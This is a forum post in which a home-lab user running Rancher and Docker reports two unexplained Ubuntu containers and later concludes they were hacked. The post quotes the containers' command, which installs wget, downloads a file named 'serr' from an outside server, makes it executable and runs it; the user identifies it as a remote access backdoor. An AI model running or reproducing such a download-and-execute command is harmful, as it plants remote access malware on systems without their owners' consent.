Can someone take a look at this? ie: am i hacked?

PLEASE CLOSE THIS. I was hacked, the serr file is a remote access backdoor. I will take appropriate action. Sorry for posting of topic.

OK, So I have been experimenting with rancher on my home lab, creating and tearing down different environments and I figured out that there are sometimes containers left behined like in swarm that will restart ans show up on one host or the other as a standalone container. However today I have 2 standalone containers that appeared to be started 7 hours before i looked and i cant make sense of them.

they are both ubuntu and refer to an ip address im the command i can’t figure out::

/bin/bash,-c, apt update;apt install wget -y;wget;chmod 777 serr;./serr;while true;do echo helloworld;sleep 20; done;

the address shows an unmodified apache server and the /serr is a file,

has someone got me? and how would they start a docker container without showing up in any logs i know about on the host.

Or is this another learning curve. the ip address is not registered to any corp so i canty figure nit out.

thanks in advance.